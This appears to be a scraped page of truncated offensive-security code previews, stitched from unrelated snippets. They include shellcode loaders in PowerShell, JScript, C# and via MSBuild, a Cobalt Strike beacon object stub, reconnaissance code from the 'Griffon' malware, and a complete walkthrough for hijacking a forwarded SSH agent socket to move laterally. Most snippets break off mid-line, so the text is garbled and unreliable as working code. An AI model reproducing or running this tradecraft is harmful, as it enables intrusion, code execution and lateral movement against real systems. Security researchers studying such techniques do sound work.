| function Invoke-SMBShellcodeLoad { | |
| <# | |
| .SYNOPSIS | |
| Short description | |
| .DESCRIPTION | |
| Long description | |
| .EXAMPLE | |
| An example |
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
| try { | |
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Public'; | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll.blg"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; | |
| // Create Base64 Object, supports encode, decode | |
| //Magic is just a cool way to decode to byte array ; | |
| function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>> |
1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: This "Serves" Shellcode in a memory mapped file.
This is no accessible to other processes.
Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
I leave this for you to explore
| #DISCLAIMER | |
| #I'm not the original author of the script... | |
| #Original git repo vanished | |
| function String-to-ByteArray ($String) | |
| { | |
| $ByteArray=@() | |
| For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
| { | |
| $Chars=$String.Substring($i*2,2) |
| '' Griffon main actions start here. | |
| Set file_system_object = CreateObject("Scripting.FileSystemObject") | |
| temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName | |
| ' Start the detailed recon. | |
| recon_info_str = get_network_adapter_info | |
| network_info_str = "" | |
| recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&" | |
| recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&" |
| Dim dnsname | |
| dnsname= "canary.troubleshootdomain.com" | |
| Set wmi = GetObject("winmgmts:") | |
| Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'") |